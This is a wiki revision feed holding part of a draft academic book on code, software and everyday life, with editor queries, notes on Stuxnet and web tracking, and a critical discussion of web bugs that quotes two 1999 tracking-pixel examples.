Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the interal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). [Eds: Can you review and revise this note where necessary]&lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious. For instance, Cryptome (2010) argues: It may be that the 'myrtus' string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4714</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4714"/>
		<updated>2012-04-18T17:23:43Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
